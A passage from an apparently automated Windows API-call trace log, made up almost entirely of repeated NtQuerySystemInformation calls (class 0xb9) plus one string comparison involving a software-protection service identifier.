Length=0x0, ResultLength=0x0) [0240.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.069] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.072] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.073] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0240.074] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.074] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0240.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.185] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0240.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.205] 